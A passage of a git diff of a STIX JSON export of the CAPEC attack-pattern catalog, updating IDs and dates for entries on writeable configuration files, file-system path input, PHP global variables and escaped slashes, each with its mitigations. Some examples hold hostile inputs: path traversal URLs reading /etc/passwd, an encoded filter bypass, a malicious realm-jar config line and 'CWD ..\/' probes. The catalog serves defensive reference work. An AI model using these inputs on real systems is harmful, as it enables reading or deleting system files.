"id": "relationship--699c4334-7451-4fef-9d1c-21597664ab3f", - "source_ref": "course-of-action--cdb6a2bd-e1b8-4d54-b997-fe0d6ed778e9", + "id": "relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316", + "source_ref": "course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b85cd921-db82-4e63-8160-31756ce415d7" + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411" }, { "name": "Manipulating Writeable Configuration Files", "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -42170,128 +42878,129 @@ "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "id": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--40db7720-dd42-4c70-8045-f1a3f8a7fb84", - "source_ref": "course-of-action--7f305fb8-6ba6-4a96-bd8e-57597fb62d8c", + "id": "relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-75-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Backup copies of all configuration files", "type": "course-of-action", - "id": "course-of-action--d35a26ae-a855-49d2-aa30-495386a2d380" + "id": "course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a342004e-f9d2-41d4-94a4-b511a17301ac", - "source_ref": "course-of-action--d35a26ae-a855-49d2-aa30-495386a2d380", + "id": "relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8", + "source_ref": "course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-75-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Integrity monitoring for configuration files", "type": "course-of-action", - "id": "course-of-action--06ee0c2f-3a17-468e-9aeb-93ffa9a0527c" + "id": "course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d3b62412-d402-47e3-93f0-6dfcbd69f4cf", - "source_ref": "course-of-action--06ee0c2f-3a17-468e-9aeb-93ffa9a0527c", + "id": "relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10", + "source_ref": "course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-75-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Enforce audit logging on code and configuration promotion procedures.", "type": "course-of-action", - "id": "course-of-action--4ffce48b-6c7f-441d-8b0d-45e47a6f0d34" + "id": "course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7b0e8af1-47a6-44a9-8daa-6a35a3d8eaff", - "source_ref": "course-of-action--4ffce48b-6c7f-441d-8b0d-45e47a6f0d34", + "id": "relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7", + "source_ref": "course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-75-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", "type": "course-of-action", - "id": "course-of-action--9a8c33c6-64ec-43e9-802f-c55347f9e9a9" + "id": "course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e1c1af90-e20f-4bbe-8cbf-fcb55f0250d9", - "source_ref": "course-of-action--9a8c33c6-64ec-43e9-802f-c55347f9e9a9", + "id": "relationship--b4102a59-40e2-4b12-9a6c-f1f3747926e5", + "source_ref": "course-of-action--de1dd950-a57f-41b0-8ba9-0ca088dc0128", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d7dc57a0-582f-4cf7-bedd-2eecfd30abdd" + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae" }, { "name": "Manipulating Web Input to File System Calls", "description": "An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", @@ -42399,104 +43108,105 @@ "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "id": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--86292b62-5f1b-4e8a-bdbd-4c8c8344ba18", - "source_ref": "course-of-action--c5869033-4f79-40b2-b258-ba163252e1fb", + "id": "relationship--93e11447-0480-49d7-aaad-956638fa7bf2", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-76-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Ensure all input is validated, and does not contain file system commands", "type": "course-of-action", - "id": "course-of-action--10d7bf5f-a3ee-4ea3-b4f6-610c2259f45e" + "id": "course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--91014bd0-014a-4c2a-8b87-ac9cf6c5afad", - "source_ref": "course-of-action--10d7bf5f-a3ee-4ea3-b4f6-610c2259f45e", + "id": "relationship--3db7674a-ce85-49f1-a061-d5c0484d9466", + "source_ref": "course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8ad42b71-91d4-453e-8d68-5ff77589d3ff", - "source_ref": "course-of-action--06e73535-1dbe-476e-89d0-45b6466eece6", + "id": "relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "name": "coa-76-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", "type": "course-of-action", - "id": "course-of-action--008efb37-465a-4081-93f8-13ebbe317561" + "id": "course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--520b8be8-0aed-4027-a86c-29e6a936efef", - "source_ref": "course-of-action--008efb37-465a-4081-93f8-13ebbe317561", + "id": "relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c", + "source_ref": "course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-01-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6b0198f8-a4ef-4cb4-8720-567b1985805d", - "source_ref": "course-of-action--868ce927-2671-4b33-b1c3-43a0804db42e", + "id": "relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bb009324-6be9-4fe5-825e-526b45b0aee6" + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f" }, { "name": "Manipulating User-Controlled Variables", "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -42596,140 +43306,141 @@ "\n Attack Example: PHP Global Variables\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "id": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-77-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", "type": "course-of-action", - "id": "course-of-action--8eed60e1-f912-4347-81a2-cbf8166d028d" + "id": "course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--be9e0c8c-9491-412a-8212-8f68ab3051ab", - "source_ref": "course-of-action--8eed60e1-f912-4347-81a2-cbf8166d028d", + "id": "relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11", + "source_ref": "course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-77-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.", "type": "course-of-action", - "id": "course-of-action--8c8e6964-9071-498c-b262-635292363a0e" + "id": "course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--205b6598-1a15-4ca3-bb8a-009edfd82106", - "source_ref": "course-of-action--8c8e6964-9071-498c-b262-635292363a0e", + "id": "relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92", + "source_ref": "course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-77-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", "type": "course-of-action", - "id": "course-of-action--6575d32c-31f5-410a-9969-6213c31855b9" + "id": "course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7026f65b-4378-42a7-9337-742042e93928", - "source_ref": "course-of-action--6575d32c-31f5-410a-9969-6213c31855b9", + "id": "relationship--f5987f26-b520-4611-9955-47308a4ab228", + "source_ref": "course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-77-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use encapsulation when declaring your variables. This is to lower the exposure of your variables.", "type": "course-of-action", - "id": "course-of-action--758e1216-0c78-423e-8223-e77c55d64fbe" + "id": "course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6c2d363a-1b9e-4e40-9d93-413b3571910e", - "source_ref": "course-of-action--758e1216-0c78-423e-8223-e77c55d64fbe", + "id": "relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3", + "source_ref": "course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-77-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should be rejected by the program.", "type": "course-of-action", - "id": "course-of-action--76f13aaf-a684-44da-8662-60fb9f67e283" + "id": "course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--243b28dc-07c5-49aa-8726-c6ad3df17a25", - "source_ref": "course-of-action--76f13aaf-a684-44da-8662-60fb9f67e283", + "id": "relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02", + "source_ref": "course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ba784eb2-6c6b-4cb9-aaa1-9a4320929ceb" + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8" }, { "name": "Using Escaped Slashes in Alternate Encoding", "description": "This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -42841,166 +43552,167 @@ "\n Attack Example: Escaped Slashes in Alternate Encodings\n An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD 